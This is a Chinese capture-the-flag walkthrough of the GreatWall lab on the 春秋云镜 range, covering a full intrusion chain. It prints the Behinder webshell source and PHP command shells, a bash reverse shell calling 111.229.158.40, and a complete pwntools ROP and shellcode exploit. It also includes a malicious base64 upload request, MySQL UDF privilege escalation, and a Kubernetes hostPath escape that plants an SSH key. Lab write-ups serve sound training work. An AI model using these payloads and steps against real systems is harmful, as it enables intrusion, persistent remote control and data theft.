
模拟实战靶标系列之春秋云镜GreatWall
2024-07-31 11:23:44

模拟实战靶标之春秋云镜GreatWall 

外网tp打点

开局是一个 ThinkPHP(tp)站点,用扫描器跑一遍即可确认存在 RCE 漏洞。利用 RCE 点击 Getshell 写入冰蝎(Behinder)木马 1722395669_66a9ac152fe33e19e2d57.png!small?1722395575484 连接密码为 rebeyond(冰蝎默认密码;下面木马中写死的 16 字节密钥 e45e329feb5d925b 即 md5("rebeyond") 的前 16 位):

<?php
// Behinder (冰蝎) v3-style PHP server side: the client posts an encrypted PHP
// payload in the raw request body; this page decrypts it with a fixed key and
// eval()s it. Exhibit only — this is the webshell dropped after the ThinkPHP RCE.
@error_reporting(0);
session_start();
// Static 16-byte key shared with the client (first 16 hex chars of
// md5("rebeyond"), the connection password given above).
$key="e45e329feb5d925b";
$_SESSION["k"]=$key;
session_write_close();
// Raw body via php://input, not $_POST, so no form encoding is involved.
$post=file_get_contents("php://input");
if(!extension_loaded("openssl"))
{
  // Fallback when OpenSSL is unavailable: base64 then a rolling XOR with the
  // key. "base64_"."decode" is split only to evade naive signature matching.
  $t="base64_"."decode";
  $post=$t($post."");

  for($i=0;$i<strlen($post);$i++) {
            // PHP precedence: `+` binds tighter than `&`, so this is ($i+1) & 15
            // — the key byte is selected with an offset of one.
            $post[$i] = $post[$i]^$key[$i+1&15];
           }
}
else
{
  // "AES128" is OpenSSL's alias for aes-128-cbc; no IV is passed, so PHP
  // falls back to an all-zero IV (with a suppressed warning). That is why the
  // client and server only need to agree on $key.
  $post=openssl_decrypt($post, "AES128", $key);
}
// Wire format after decryption is "<func>|<params>"; only the second field is used.
$arr=explode("|",$post);
$func=$arr[0];
$params=$arr[1];
// eval() of attacker-controlled input through a callable object rather than a
// literal eval($_POST[...]), again to sidestep simple pattern-based detection.
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>

连接冰蝎木马后,再上传一个可被 PHP 解析执行的 1.php(内容如下),用于执行命令和读取文件:

<?=`$_GET[1]`;echo md5(1); /* backticks == shell_exec(): runs ?1=<cmd> and echoes its output; md5(1) (c4ca4238a0b923820dcc509a6f75849b) is just a marker proving the file is executed as PHP */ ?>

先在攻击机(111.229.158.40)上 `nc -lvnp 3333` 监听,再访问该文件触发反弹 shell。命令经 1.php 中的反引号执行,参数需 URL 编码:`&`→`%26`,`/`→`%2f`,`.`→`%2e`(下面的 URL 末尾少了一个闭合的 `"`):

1.php?1=bash -c "bash -i >%26 %2fdev%2ftcp%2f111%2e229%2e158%2e40%2f3333 0>%261

拿到反弹 shell 后,先把它升级为交互式 Shell,再用 Frp 把内网流量穿透出来(socks 代理),具体配置见本系列前文。

内网Shiro利用

代理挂好后即可访问内网资源。把 fscan 上传到跳板机对 172.28.23.0/24 段扫描,结果如下:

172.28.23.26:21 open
172.28.23.17:22 open
172.28.23.33:8080 open
172.28.23.17:8080 open
172.28.23.26:80 open
172.28.23.26:22 open
172.28.23.17:80 open
172.28.23.33:22 open
[*] alive ports len is: 8
start vulscan
[*] WebTitle http://172.28.23.17:8080 code:200 len:1027   title:Login Form
[*] WebTitle http://172.28.23.17       code:200 len:10887 title:""
[*] WebTitle http://172.28.23.26       code:200 len:13693 title:新翔OA管理系统-OA管理平台联系电话:1****48微信同号,QQ95****3
[+] ftp 172.28.23.26:21:anonymous
[->]OASystem.zip
[*] WebTitle http://172.28.23.33:8080 code:302 len:0     title:None 跳转url: http://172.28.23.33:8080/login;jsessionid=1396A1D8359BFFDE444D2D448474E67E
[*] WebTitle http://172.28.23.33:8080/login;jsessionid=1396A1D8359BFFDE444D2D448474E67E code:200 len:3860   title:智联科技 ERP 后台登陆
[+] PocScan http://172.28.23.17:8080 poc-yaml-thinkphp5023-method-rce poc1
[+] PocScan http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2

组合拳:Spring Boot Actuator 未授权暴露了 /actuator/heapdump(对应 fscan 结果中的 `poc-yaml-spring-actuator-heapdump-file`),下载堆转储后用 JDumpSpider-1.1-SNAPSHOT-full.jar 解析,从内存对象中提取出 Shiro 的 rememberMe AES 密钥:

key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES

密钥已知后,用 Shiro 利用工具(shiro summer)直接枚举可用的反序列化利用链(这里"爆破"的是 gadget 链而不是密钥,密钥已经从 heapdump 拿到),注意这里选择为如下 1722395699_66a9ac33c08fe94f3d2f4.png!small?1722395606002 然后植入内存马 1722395705_66a9ac397197345b87666.png!small?1722395611847

pwn二进制

信息收集:172.28.23.33 上除 8080 外还开放了 59696 端口(见下方 fscan 结果),`nc 172.28.23.33 59696` 连上是一个菜单式的二进制服务(HashNote),需要对它进行 pwn:

www-data@portal:/tmp$ ./f -h 172.28.23.33 -p 1-65535

___                             _    
/ _ \     ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_| \__,_|\___|_|\_\  
                fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.28.23.33   is alive
[*] Icmp alive hosts len is: 1
172.28.23.33:22 open
172.28.23.33:8080 open
172.28.23.33:59696 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://172.28.23.33:8080 code:302 len:0     title:None 跳转url: http://172.28.23.33:8080/login;jsessionid=17FB34D9B99ED0D3645129276D3A5
[*] WebTitle: http://172.28.23.33:8080/login;jsessionid=17FB34D9B99ED0D3645129276D3A5 code:200 len:3860   title:智联科技 ERP 后台登陆
[+] http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file
[+] http://172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2

1722395732_66a9ac543c50a79436cd9.png!small?1722395638433

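from pwn import *

# Exploit for the HashNote service on 172.28.23.33:59696 (port found by the
# fscan sweep above). Flow: authenticate, plant a fake entry inside the
# username buffer to get arbitrary read/write, leak a stack address through
# `environ`, then write a ROP chain that mprotect()s the username page RWX and
# returns into the shellcode stored there. Every address below is specific to
# this binary (the absolute addresses suggest a static, non-PIE build — confirm
# with `checksec`); none of them transfer to another build.

elf = ELF('./HashNote')
context(arch=elf.arch, os='linux', log_level='debug')
# p = process('./HashNote')

p = remote('172.28.23.33', 59696)


def send_command(command):
    """Pick a menu option; the menu prompt ends in ': '."""
    # pwntools tube I/O is bytes; sending a str only works through a
    # deprecated implicit-encoding path, so encode explicitly.
    p.sendlineafter(b': ', str(command).encode())


def add_entry(key, value):
    """Menu 1: create an entry `key` -> `value`."""
    send_command(1)
    p.sendlineafter(b'Key: ', key)
    p.sendlineafter(b'Data: ', value)


def get_entry(key):
    """Menu 2: print the data stored under `key` (our read primitive)."""
    send_command(2)
    p.sendlineafter(b'Key: ', key)


def update_entry(key, value):
    """Menu 3: overwrite the data stored under `key` (our write primitive)."""
    send_command(3)
    p.sendlineafter(b'Key: ', key)
    p.sendlineafter(b'Data: ', value)


def set_username(value):
    """Menu 4: replace the username buffer.

    `value` is sent raw (sendafter, no newline), so callers pad it to the full
    buffer size (128 bytes below) to make the read consume exactly one message.
    """
    send_command(4)
    p.sendafter(b'New username: ', value)


# Authenticate
p.sendlineafter(b'Username: ', b'123')
p.sendlineafter(b'Password: ', b'freep@ssw0rd:3')

# Add entries to set up the environment. The keys are presumably chosen to land
# in the same hash bucket as the fake key 'aahO' used below — confirm against
# the binary's hash function.
add_entry(b'aabP', b'aaaaaaaa')
add_entry(b'aace', b'C' * 0xc0)

# x86-64 execve("//bin/sh", ["//bin/sh", NULL], NULL)
sc = [
    b'\x6a\x3b',                   # push   0x3b          (SYS_execve)
    b'\x58',                       # pop    rax
    b'\x99',                       # cdq                  (rdx = 0 -> envp = NULL)
    b'\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68',  # movabs rbx, "//bin/sh"
    b'\x53',                       # push   rbx
    b'\x48\x89\xe7',               # mov    rdi, rsp      (pathname)
    b'\x52',                       # push   rdx           (argv NULL terminator)
    b'\x57',                       # push   rdi
    b'\x48\x89\xe6',               # mov    rsi, rsp      (argv)
    b'\x0f\x05',                   # syscall
]
shellcode = b''.join(sc)

# Fixed address of the username buffer; the fake entry is placed 0x10 bytes in
# and the shellcode ends up at username_addr + 0x48 (16 + 56 bytes of header).
username_addr = 0x5dc980
fake_obj_addr = username_addr + 0x10


def _fake_entry(data_ptr, data_len):
    """Build a fake HashNote entry whose data supposedly lives at `data_ptr`.

    Assumed layout (this is what the original exploit emits; verify in the
    binary): key pointer, key length, 16 bytes of inline key, data pointer,
    data length, 8 bytes of padding.
    """
    obj = p64(fake_obj_addr + 0x10) + p64(4)
    obj += b'aahO'.ljust(0x10, b'\x00')
    obj += p64(data_ptr) + p64(data_len) + b'aaaaaaaa'
    return obj


def _plant_fake_entry(data_ptr, data_len):
    """Write [entry pointer | marker | fake entry | shellcode] into the username
    buffer, zero-padded to its full 128 bytes."""
    payload = p64(fake_obj_addr) + p64(0xdeadbeef)
    payload += _fake_entry(data_ptr, data_len)
    payload += shellcode
    set_username(payload.ljust(128, b'\x00'))


def arbitrary_read(addr):
    """Make the service print 8 bytes from `addr` via get_entry('aahO')."""
    _plant_fake_entry(addr, 8)
    get_entry(b'aahO')


def arbitrary_write(addr, data):
    """Write `data` to `addr` via update_entry('aahO', data)."""
    _plant_fake_entry(addr, len(data))
    update_entry(b'aahO', data)


# Leak the stack address: read what is presumably libc's `environ` pointer,
# located at a fixed address in this (apparently static) binary.
environ = 0x5e4c38
arbitrary_read(environ)
# Keep the last 6 bytes up to and including the 0x7f high byte of the pointer.
stack_addr = u64(p.recvuntil(b'\x7f', drop=False)[-6:].ljust(8, b'\0'))
# pwntools' success() %-formats its message lazily; passing the address as a
# bare extra argument (as the original did) raises inside the logger and the
# value is never printed. Give it a format string instead.
success('stack_addr: %#x', stack_addr)

# ROP gadgets (names as in the original exploit; not re-verified here)
rdi = 0x0000000000405e7c          # pop rdi ; ret
rsi = 0x000000000040974f          # pop rsi ; ret
rax = 0x00000000004206ba          # pop rax ; ret
rdx_rbx = 0x000000000053514b      # pop rdx ; pop rbx ; ret
shr_eax_2 = 0x0000000000523f2e    # shr eax, 2 ; ret
syscall_ret = 0x00000000004d9776  # syscall ; ret

# mprotect(page(username_addr), 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC), then
# return into the shellcode. rax is loaded as 40 and shifted right by 2 to reach
# SYS_mprotect (10) — presumably because a literal 0x0a (newline) byte would
# terminate the line-based Data read.
payload = b''.join([
    p64(rdi), p64(username_addr & ~0xfff),
    p64(rsi), p64(0x1000),
    p64(rdx_rbx), p64(7), p64(0),
    p64(rax), p64(0xa << 2),
    p64(shr_eax_2),
    p64(syscall_ret),
    p64(username_addr + 0x48),    # shellcode offset inside the username buffer
])

# Overwrite the saved return address (stack_addr - 0x210 on this build) so the
# chain runs when the current handler returns.
arbitrary_write(stack_addr - 0x210, payload)
p.sendline(b'uname -ar')

p.interactive()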

1722395813_66a9aca5398d86f1c1f53.png!small?1722395719527

内网新翔OA

审计代码发现命令执行。源码来自 FTP 匿名登录泄露的 OASystem.zip(fscan 结果中的 `ftp 172.28.23.26:21:anonymous`),其中 uploadbase64.php 如下:

<?php
// uploadbase64.php from the 新翔OA source (OASystem.zip, pulled over anonymous
// FTP). Takes a data: URI in POST imgbase64 and writes the decoded bytes under
// upload/. Shown as-is for the audit; the defects are called out inline.
$img = $_POST['imgbase64'];
// VULNERABILITY: the file extension is the MIME subtype captured from the
// attacker-controlled prefix, with no whitelist — "data:image/php;base64,..."
// yields "upload/<date>-<uniqid>.php". The decoded body is never checked to be
// an image either. A fix would whitelist extensions (png/jpg/gif), validate
// the bytes (getimagesize()/finfo) and never derive the name from input.
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
$type = ".".$result[2];
$path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
// If the regex did not match, $result[1] and $path are undefined; the @ below
// silences the resulting notices and the write simply fails.
$img = base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
// The response echoes the generated path, so the attacker learns exactly where
// the webshell landed without guessing the uniqid().
exit('{"src":"'.$path.'"}');

请求 /uploadbase64.php,把 data URI 的 MIME 子类型写成 php 即可让文件以 .php 后缀落盘。下面请求体里的 base64 解码后为 `<?=`$_GET[1]`;eval($_POST[1]);?>`,即同时提供 GET 命令执行和 POST eval(便于蚁剑/冰蝎连接):

POST /uploadbase64.php HTTP/1.1
Host: 172.28.23.26
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

imgbase64=data:image/php;base64,PD89YCRfR0VUWzFdYDtldmFsKCRfUE9TVFsxXSk7Pz4=

绕过 disable_functions:system 等执行函数被 php.ini 禁用,使用蚁剑(AntSword)的 disable_functions 绕过插件 1722395821_66a9acad349d1acf6560a.png!small?1722395727722 插件会在同目录生成 .antproxy.php 作为代理入口,需要编辑生成的文件 1722395826_66a9acb242d54faacb127.png!small?1722395732653 另外写入一个新的 cmd.php(内容如下),再通过 .antproxy.php 去加载执行:

<?php system($_GET['cmd']); /* cmd.php: plain command shell, only usable once the disable_functions bypass (.antproxy.php) is in place */ ?>

# 访问执行
/upload/.antproxy.php?cmd=ls

# 查看 /usr/bin 下带特殊权限位的程序(可用 find / -perm -4000 -type f 2>/dev/null 确认 SUID),发现 base32 具有高权限,可借它以提升后的权限读取任意文件
/upload/.antproxy.php?cmd=base32%20/flag02.txt

1722395837_66a9acbd4dfed8da0e30a.png!small?1722395743509

内网Harbor未授权漏洞

主机 172.22.14.46 的 Harbor 存在 CVE-2022-46463(未授权访问镜像仓库,可直接列出并拉取项目镜像),用 harbor.py 利用,指令如下:

proxychains python3 harbor.py http://172.22.14.46
-----
[*] API version used v2.0
[+] project/projectadmin
[+] project/portal
[+] library/nginx
[+] library/redis
[+] harbor/secret

proxychains python3 harbor.py http://172.22.14.46 --dump harbor/secret --v2
-----
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib64/proxychains-ng/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.17
[+] Dumping : harbor/secret:latest
[+] Downloading : 58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50
[+] Downloading : b51569e7c50720acf6860327847fe342a1afbe148d24c529fb81df105e3eed01
[+] Downloading : da8ef40b9ecabc2679fe2419957220c0272a965c5cf7e0269fa1aeeb8c56f2e1
[+] Downloading : fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e
[+] Downloading : 413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49
[+] Downloading : 8bd8c9755cbf83773a6a54eff25db438debc22d593699038341b939e73974653

# 镜像文件查看到flag5
cat 413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49/f1ag05_Yz1o.txt  
-----
flag05: flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}#

分析镜像文件,发现运行了 run.sh,内容如下:

cat 90d3d033513d61a56d1603c00d2c9d72a9fa8cfee799f3b1737376094b2f3d4c/run.sh 
-----
#!/bin/bash
sleep 1

# start
java -jar /app/ProjectAdmin-0.0.1-SNAPSHOT.jar
/usr/bin/tail -f /dev/null#

分析 ProjectAdmin-0.0.1-SNAPSHOT.jar:Spring Boot fat jar 解压或用反编译工具打开即可,在配置文件 application.properties(通常位于 BOOT-INF/classes/)中找到明文数据库账号密码:

spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver

挂全局代理,直接渗透这台 MySQL(配置里是 jdbc:mysql、3306 端口,不是 MSSQL)

MySQL + UDF 提权

全局代理下,用 root / My3q1i4oZkJm3 连接 172.22.10.28:3306,根据 MySQL 版本和系统架构选择对应的 UDF 动态库进行提权(写入 plugin 目录需要 FILE 权限,且 secure_file_priv 不能限制该目录):

-- Precondition: INTO DUMPFILE only works when secure_file_priv is "" (any
-- path) or points at the plugin directory; NULL disables file writes entirely.
show global variables like '%secure_file_priv%';
-- Output line, not a statement: the server's plugin_dir (presumably from
-- `show variables like 'plugin_dir'`), which is where the UDF must be written.
/usr/lib/mysql/plugin/
-- Write the UDF shared object. The hex is truncated here ("7F454C46" is the
-- ELF magic); it must be the full lib_mysqludf_sys.so built for the server's
-- architecture and MySQL version. Requires the FILE privilege and a plugin_dir
-- writable by the mysqld OS user.
select unhex('7F454C4602010100000000000000000003003...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
-- Register the function; commands run with the privileges of the mysqld process.
create function sys_eval returns string soname 'mysqludf.so';

select sys_eval('cat /f2ag06_Aq1aqx.txt');

1722395859_66a9acd3556f50a01c6f5.png!small?1722395766345UDF提权成功1722395865_66a9acd95b09d04bb6cbe.png!small?1722395771669

K8S

参考:https://xz.aliyun.com/t/14986?time__1311=GqAh0KAKY5DK7KDs6YYK0%3DDO8wMSn11oaoD#toc-8 。先用 fscan 对 172.22.14.37 搜集信息(6443 是 API Server,10250 是 kubelet,2379/2380 是 etcd):

www-data@portal:/tmp$ ./f -h 172.22.14.37 -p 1-655351

___                             _    
/ _ \     ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_| \__,_|\___|_|\_\  
                fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.14.37   is alive
[*] Icmp alive hosts len is: 1
172.22.14.37:22 open
172.22.14.37:2379 open
172.22.14.37:2380 open
172.22.14.37:6443 open
172.22.14.37:10256 open
172.22.14.37:10250 open
172.22.14.37:10251 open
172.22.14.37:10252 open
[*] alive ports len is: 8
start vulscan
[*] WebTitle: http://172.22.14.37:10252 code:404 len:19     title:None
[*] WebTitle: http://172.22.14.37:10251 code:404 len:19     title:None
[*] WebTitle: https://172.22.14.37:6443 code:200 len:4671   title:None
[*] WebTitle: http://172.22.14.37:10256 code:404 len:19     title:None
[*] WebTitle: https://172.22.14.37:10250 code:404 len:19     title:None
[+] https://172.22.14.37:6443 poc-yaml-go-pprof-leak
[+] https://172.22.14.37:6443 poc-yaml-kubernetes-unauth

evil.yaml(一个 Deployment,把宿主机根目录 / 通过 hostPath 挂载到容器的 /mnt,用于逃逸到节点;原文贴出时缩进丢失,下面按正确缩进给出):

└─# cat evil.yaml 
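# evil.yaml — deployment used against the unauthenticated API server on
# 172.22.14.37:6443. The pod is not "privileged"; the escape comes from the
# hostPath volume: the node's root filesystem is mounted at /mnt, so writing
# /mnt/root/.ssh/authorized_keys (done below) gives root SSH on the node.
# No nodeSelector is set, so the pod lands wherever the scheduler puts it —
# on this single-node cluster that is the control plane itself.
apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
        - name: nginx
          image: nginx:1.8   # any long-running image the node can pull works
          volumeMounts:
            - mountPath: /mnt
              name: test-volume
      volumes:
        - name: test-volume
          hostPath:
            path: /          # node root filesystem -> container escape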
D:\内网\K8s工具利用>kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil.yaml
Please enter Username: test
Please enter Password: deployment.apps/nginx-deployment configured

D:\内网\K8s工具利用>
D:\内网\K8s工具利用>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
Please enter Username: test
Please enter Password: NAME                               READY   STATUS   RESTARTS   AGE
nginx-deployment-864f8bfd6f-75g9w   1/1     Running   0         17s

D:\内网\K8s工具利用>
D:\内网\K8s工具利用>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment -- /bin/bash
Please enter Username: test
Please enter Password: Error from server (NotFound): pods "nginx-deployment" not found

D:\内网\K8s工具利用>
D:\内网\K8s工具利用>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-75g9w -- /bin/bash
Please enter Username: test
Please enter Password: root@nginx-deployment-864f8bfd6f-75g9w:/#
root@nginx-deployment-864f8bfd6f-75g9w:/#
root@nginx-deployment-864f8bfd6f-75g9w:/# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDA6ZrWvEavoM39593UheEiZbeLbprBkdCkhN1qtYxgMMLKpy6foJQNmG5ulysO6S4YDJSHYTkSJbm+kOl9sPFDUTlr8bDkdtzGLbtxEiyHzYkPGEDfEbppX5uRzOxSXKpqY3Lork38ZtYjcQhuMDeC5y5WPAUwQ0dRtDY6d843qrZ+P1bD9DKuqcdIsByCbo7py94965e+rAcz4ihKZDkAeZLpnU0t6zB55+Ww01MUddeP0uNoNtVJ71M8EWyGTS07BuHNhp26zoXRMZi2bN2s5hY9nY2lzyfUL0WNoZ+EFHfd6PtH2EHhISL5MErm3KrgDfvUaw8GsZaFwWXrdZxOp0t3e+8mfSSQt1AvagB7K8go6TOnqAIlIa2XLnM3vrlfS0LN2B82EPtrVQDq5sGgQ+J0sv1u3JJVx8Di1B9H+lBxo3kvbiAklvn1OfQuiDt3Rq8jYf6nNxMxr87sfuGsXrvPBksD2FXx10WxsKDFjGAkSbUfLfrTp1IYLtCxabs= root@kali" > /mnt/root/.ssh/authorized_keys
root@nginx-deployment-864f8bfd6f-75g9w:/#

上面 kubectl 提示输入用户名/密码时随便输入(test)就能通过,说明 API Server 接受匿名/未授权请求(对应 fscan 的 `poc-yaml-kubernetes-unauth`)。Pod 起来后 exec 进去,把 Kali 的公钥写入 /mnt/root/.ssh/authorized_keys(即宿主机的 /root/.ssh/authorized_keys),然后在 Kali 上通过代理免密 SSH 登录节点:

┌──(root㉿kali)-[~/.ssh]
└─# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDA6ZrWvEavoM39593UheEiZbeLbprBkdCkhN1qtYxgMMLKpy6foJQNmG5ulysO6S4YDJSHYTkSJbm+kOl9sPFDUTlr8bDkdtzGLbtxEiyHzYkPGEDfEbppX5uRzOxSXKpqY3Lork38ZtYjcQhuMDeC5y5WPAUwQ0dRtDY6d843qrZ+P1bD9DKuqcdIsByCbo7py94965e+rAcz4ihKZDkAeZLpnU0t6zB55+Ww01MUddeP0uNoNtVJ71M8EWyGTS07BuHNhp26zoXRMZi2bN2s5hY9nY2lzyfUL0WNoZ+EFHfd6PtH2EHhISL5MErm3KrgDfvUaw8GsZaFwWXrdZxOp0t3e+8mfSSQt1AvagB7K8go6TOnqAIlIa2XLnM3vrlfS0LN2B82EPtrVQDq5sGgQ+J0sv1u3JJVx8Di1B9H+lBxo3kvbiAklvn1OfQuiDt3Rq8jYf6nNxMxr87sfuGsXrvPBksD2FXx10WxsKDFjGAkSbUfLfrTp1IYLtCxabs= root@kali
                                                                                                         
┌──(root㉿kali)-[~/.ssh]
└─# proxychains ssh -i id_rsa root@172.22.14.37                                              

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ...  111.229.158.40:6001 ...  172.22.14.37:22 ... OK
The authenticity of host '172.22.14.37 (172.22.14.37)' can't be established.
ED25519 key fingerprint is SHA256:HoDMJEcuW20qdBht/lh1c7lgi7TqtEVQK5Dh2X9zVlI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.22.14.37' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:       https://ubuntu.com/advantage

Welcome to Alibaba Cloud Elastic Compute Service !

Last login: Mon Mar 25 16:55:32 2024 from 36.112.10.1

读取 flag4:root 的 ~/.mysql_history 里记录了建表和插入语句,flag 以 base64 形式写在 INSERT 语句中(历史文件里的 \040 是空格的八进制转义):

root@ubuntu-k8s:~# cat .mysql_history 
_HiStOrY_V2_
show\040databases;
create\040database\040flaghaha;
use\040flaghaha
DROP\040TABLE\040IF\040EXISTS\040`f1ag`;
CREATE\040TABLE\040`flag06`\040(
`id`\040int\040DEFAULT\040NULL,
\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL
)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
CREATE\040TABLE\040`flag06`\040(\040`id`\040int\040DEFAULT\040NULL,\040\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL\040)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
show\040tables;
drop\040table\040flag06;
DROP\040TABLE\040IF\040EXISTS\040`f1ag`;
CREATE\040TABLE\040`flag04`\040(
`id`\040int\040DEFAULT\040NULL,
\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL
)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
CREATE\040TABLE\040`flag04`\040(\040`id`\040int\040DEFAULT\040NULL,\040\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL\040)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
INSERT\040INTO\040`flag`\040VALUES\040(1,\040'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==');
INSERT\040INTO\040`flag04`\040VALUES\040(1,\040'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==');
exit
root@ubuntu-k8s:~#

对 INSERT 里的 base64 字符串解码即可得到 flag4(flag{da69c459-7fe5-4535-b8d1-15fff496a29f}):

1722395883_66a9aceb774f9379f4d7f.png!small?1722395789700

结:一步一脚印,后续靶标系列还会持续更新。欢迎师傅们交流学习,靶标来源春秋云镜平台

# 漏洞 # 渗透测试 # web安全 # 内网渗透